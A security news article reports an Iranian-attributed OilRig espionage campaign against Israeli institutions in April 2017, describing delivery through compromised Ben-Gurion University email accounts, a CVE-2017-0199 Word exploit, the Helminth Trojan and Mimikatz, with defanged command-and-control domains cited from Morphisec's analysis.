In a first time, the authorities blamed a foreign state for the massive cyber espionage campaign against major Israeli institutions and government officials, now the Authority blames Iranian state-sponsored hackers for the cyber attack.
According to the Israeli Cyber Defense Authority, hackers targeted against some 250 individuals between April 19 and 24 in various sectors, including government agencies, high-tech companies, medical organizations, and educational institutions. including the renowned Ben-Gurion University.
Hackers also targeted experts at the prestigious Ben-Gurion University, where researchers conduct advanced researchers. The threat actors leveraged stolen email accounts from Ben-Gurion to deliver malware to victims.
“From April 19-24, 2017, a politically-motivated, targeted campaign was carried out against numerous Israeli organizations. Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details. Initial reports of the attacks, published April 26 (in Hebrew) by the Israel National Cyber Event Readiness Team (CERT-IL) and The Marker, confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel. Ironically, Ben-Gurion University is home to Israel’s Cyber Security Research Center.” reads the analysis shared by Morphisec. “Investigators put the origin of the attack as Iranian; Morphisec’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns.“
The exploitation of this specific flaw demonstrates the technical evolution of the OilRig APT group. The attack doesn’t request user’s interaction like macro-enable attacks, the weaponized document contains an exploit via an embedded link packed with an HTML executable.
“The attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word, CVE-2017-0199, by actually reusing an existing PoC that have been published immediately after the patch release. Microsoft released the patch for the vulnerability on April 11 but many organizations have not yet deployed the update. The delivered documents installed a fileless variant of the Helminth Trojan agent.” continues the analysis.
Experts at Morphisec discovered that hackers used a customized version of the open-source Mimikatz tool to gain access to user credentials in the Windows Local Security Authority Subsystem Service.
“Morphisec identified few more samples of communication with different other C&C servers (“alenupdate[.]info” and “maralen[.]tk”) in which a more advanced customized version of Mimikatz has been sent to specific users and additional agent have been installed in “C:\Program Files (x86)\Microsoft Idle\” directory:” states Morphisec.
Early this year the OilRig APT was involved in a string of cyber attacks targeted several Israeli organizations, including IT vendors, the national postal service, and financial institutions.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.